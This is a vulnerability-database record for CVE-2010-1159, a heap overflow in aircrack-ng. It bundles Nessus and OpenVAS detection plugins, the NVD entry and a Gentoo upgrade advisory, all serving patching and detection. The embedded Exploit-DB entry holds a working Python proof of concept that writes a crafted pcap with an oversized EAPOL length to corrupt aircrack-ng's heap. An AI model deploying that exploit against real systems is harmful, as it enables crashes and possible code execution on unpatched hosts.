{"id": "MANDRIVA_MDVSA-2013-251.NASL", "bulletinFamily": "scanner", "title": "Mandriva Linux Security Advisory : aircrack-ng (MDVSA-2013:251)", "description": "Updated aircrack-ng package fixes security vulnerability :\n\nA buffer overflow vulnerability has been discovered in Aircrack-ng. A\nremote attacker could entice a user to open a specially crafted dump\nfile using Aircrack-ng, possibly resulting in execution of arbitrary\ncode with the privileges of the process or a Denial of Service\ncondition (CVE-2010-1159).", "published": "2013-10-20T00:00:00", "modified": "2013-10-20T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/70518", "reporter": "This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.", "references": ["http://advisories.mageia.org/MGASA-2013-0307.html"], "cvelist": ["CVE-2010-1159"], "type": "nessus", "lastseen": "2021-01-07T11:54:22", "edition": 24, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-1159"]}, {"type": "gentoo", "idList": ["GLSA-201310-06"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310121044"]}, {"type": "exploitdb", "idList": ["EDB-ID:12217"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201310-06.NASL"]}], "modified": "2021-01-07T11:54:22", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-01-07T11:54:22", "rev": 2}, "vulnersScore": 7.3}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:251. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70518);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1159\");\n script_bugtraq_id(39045);\n script_xref(name:\"MDVSA\", value:\"2013:251\");\n\n script_name(english:\"Mandriva Linux Security Advisory : aircrack-ng (MDVSA-2013:251)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated aircrack-ng package fixes security vulnerability :\n\nA buffer overflow vulnerability has been discovered in Aircrack-ng. A\nremote attacker could entice a user to open a specially crafted dump\nfile using Aircrack-ng, possibly resulting in execution of arbitrary\ncode with the privileges of the process or a Denial of Service\ncondition (CVE-2010-1159).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2013-0307.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected aircrack-ng package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:aircrack-ng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"aircrack-ng-1.1-5.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "pluginID": "70518", "cpe": ["p-cpe:/a:mandriva:linux:aircrack-ng", "cpe:/o:mandriva:business_server:1"], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T19:34:37", "description": "Multiple heap-based buffer overflows in Aircrack-ng before 1.1 allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) large length value in an EAPOL packet or (2) long EAPOL packet.", "edition": 5, "cvss3": {}, "published": "2013-10-28T22:55:00", "title": "CVE-2010-1159", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1159"], "modified": "2013-10-29T20:53:00", "cpe": ["cpe:/a:aircrack-ng:aircrack-ng:0.2.1", "cpe:/a:aircrack-ng:aircrack-ng:0.4", "cpe:/a:aircrack-ng:aircrack-ng:0.6", "cpe:/a:aircrack-ng:aircrack-ng:0.7", "cpe:/a:aircrack-ng:aircrack-ng:0.9", "cpe:/a:aircrack-ng:aircrack-ng:0.1", "cpe:/o:gentoo:linux:*", "cpe:/a:aircrack-ng:aircrack-ng:0.9.2", "cpe:/a:aircrack-ng:aircrack-ng:0.6.1", "cpe:/a:aircrack-ng:aircrack-ng:0.4.1", "cpe:/a:aircrack-ng:aircrack-ng:0.3", "cpe:/a:aircrack-ng:aircrack-ng:0.9.1", "cpe:/a:aircrack-ng:aircrack-ng:0.4.4", "cpe:/a:aircrack-ng:aircrack-ng:1.0", "cpe:/a:aircrack-ng:aircrack-ng:0.9.3", "cpe:/a:aircrack-ng:aircrack-ng:0.5", "cpe:/a:aircrack-ng:aircrack-ng:0.4.3", "cpe:/a:aircrack-ng:aircrack-ng:0.2", "cpe:/a:aircrack-ng:aircrack-ng:0.6.2", "cpe:/a:aircrack-ng:aircrack-ng:0.4.2", "cpe:/a:aircrack-ng:aircrack-ng:0.8"], "id": "CVE-2010-1159", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1159", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:aircrack-ng:aircrack-ng:0.7:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:1.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.9.3:*:*:*:*:*:*:*", "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.1:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:aircrack-ng:aircrack-ng:0.4.4:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2010-1159"], "edition": 1, "description": "### Background\n\nAircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. \n\n### Description\n\nA buffer overflow vulnerability has been discovered in Aircrack-ng.\n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted dump file using Aircrack-ng, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Aircrack-ng users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-wireless/aircrack-ng-1.1-r2\"", "modified": "2013-10-07T00:00:00", "published": "2013-10-07T00:00:00", "id": "GLSA-201310-06", "href": "https://security.gentoo.org/glsa/201310-06", "type": "gentoo", "title": "Aircrack-ng: User-assisted execution of arbitrary code", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:36:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1159"], "description": "Gentoo Linux Local Security Checks GLSA 201310-06", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121044", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121044", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201310-06", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201310-06.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121044\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:05 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201310-06\");\n script_tag(name:\"insight\", value:\"A buffer overflow vulnerability has been discovered in Aircrack-ng.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201310-06\");\n script_cve_id(\"CVE-2010-1159\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201310-06\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-wireless/aircrack-ng\", unaffected: make_list(\"ge 1.1-r2\"), vulnerable: make_list(\"lt 1.1-r2\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T15:58:33", "description": "Remote Exploit Against the Aircrack-NG Tools svn r1675. CVE-2010-1159. Dos exploits for multiple platform", "published": "2010-04-14T00:00:00", "type": "exploitdb", "title": "Remote Exploit Against the Aircrack-NG Tools svn r1675", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1159"], "modified": "2010-04-14T00:00:00", "id": "EDB-ID:12217", "href": "https://www.exploit-db.com/exploits/12217/", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: UTF-8 -*-\r\n\r\n''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.\r\n \r\n The tools' code responsible for parsing IEEE802.11-packets assumes the\r\n self-proclaimed length of a EAPOL-packet to be correct and never to exceed\r\n a (arbitrary) maximum size of 256 bytes for packets that are part of the\r\n EAPOL-authentication. We can exploit this by letting the code parse packets\r\n which:\r\n a) proclaim to be larger than they really are, possibly causing the code\r\n to read from invalid memory locations while copying the packet;\r\n b) really do exceed the maximum size allowed and overflow data structures\r\n allocated on the heap, overwriting libc's allocation-related\r\n structures. This causes heap-corruption.\r\n \r\n Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-\r\n path. Careful layout of the packet's content can even possibly alter the\r\n instruction-flow through the already well known heap-corruption paths\r\n in libc. Playing with the proclaimed length of the EAPOL-packet and the\r\n size and content of the packet's padding immediately end up in various\r\n assertion errors during calls to free(). This reveals the possibility to\r\n gain control over $EIP.\r\n \r\n Given that we have plenty of room for payload and that the tools are\r\n usually executed with root-privileges, we should be able to have a\r\n single-packet-own-everything exploit at our hands. As the attacker can\r\n cause the various tools to do memory-allocations at his will (through\r\n faking the appearance of previously unknown clients), the resulting\r\n exploit-code should have a high probability of success.\r\n\r\n The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev\r\n r238 to work. It generates pcap-file with single packet of the following\r\n content:\r\n \r\n 0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0\r\n 108000000000000000000000000000000000000000000000000000000000000000000000000\r\n 000000000000000000000000000000000000000000000000000000000000000000000000000\r\n 000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172\r\n 3F\r\n\r\n 03/27/2010, Lukas Lueg, lukas.lueg@gmail.com\r\n'''\r\n\r\nimport cpyrit.pckttools\r\nimport scapy.layers\r\n\r\n# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second\r\n# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-\r\n# packet will cause an overflow of the \"eapol\"-field in struct WPA_ST_info and\r\n# struct WPA_hdsk.\r\n# We have plenty of room for exploit-payload as most of the fields in the\r\n# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent\r\n# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in\r\n# case of airodump-ng...\r\npckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \\\r\n addr2='00:de:ad:c0:de:01', \\\r\n FCfield='to-DS') \\\r\n / scapy.layers.dot11.LLC() \\\r\n / scapy.layers.dot11.SNAP() \\\r\n / scapy.layers.l2.EAPOL(len=65000) \\\r\n / cpyrit.pckttools.EAPOL_Key() \\\r\n / cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \\\r\n / scapy.packet.Padding(load='Can I has some moar?')\r\n\r\nif __name__ == '__main__':\r\n print \"Packet's content:\"\r\n print ''.join(\"%02X\" % ord(c) for c in str(pckt))\r\n filename = 'aircrackng_exploit.cap'\r\n print \"Writing to '%s'\" % filename\r\n writer = cpyrit.pckttools.Dot11PacketWriter(filename)\r\n writer.write(pckt)\r\n writer.close()\r\n print 'Done'\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/12217/"}], "nessus": [{"lastseen": "2021-01-07T10:55:03", "description": "The remote host is affected by the vulnerability described in GLSA-201310-06\n(Aircrack-ng: User-assisted execution of arbitrary code)\n\n A buffer overflow vulnerability has been discovered in Aircrack-ng.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted dump\n file using Aircrack-ng, possibly resulting in execution of arbitrary code\n with the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 22, "published": "2013-10-08T00:00:00", "title": "GLSA-201310-06 : Aircrack-ng: User-assisted execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1159"], "modified": "2013-10-08T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:aircrack-ng", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201310-06.NASL", "href": "https://www.tenable.com/plugins/nessus/70324", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201310-06.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70324);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1159\");\n script_bugtraq_id(39045);\n script_xref(name:\"GLSA\", value:\"201310-06\");\n\n script_name(english:\"GLSA-201310-06 : Aircrack-ng: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201310-06\n(Aircrack-ng: User-assisted execution of arbitrary code)\n\n A buffer overflow vulnerability has been discovered in Aircrack-ng.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted dump\n file using Aircrack-ng, possibly resulting in execution of arbitrary code\n with the privileges of the process or a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201310-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Aircrack-ng users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-wireless/aircrack-ng-1.1-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:aircrack-ng\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-wireless/aircrack-ng\", unaffected:make_list(\"ge 1.1-r2\"), vulnerable:make_list(\"lt 1.1-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Aircrack-ng\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}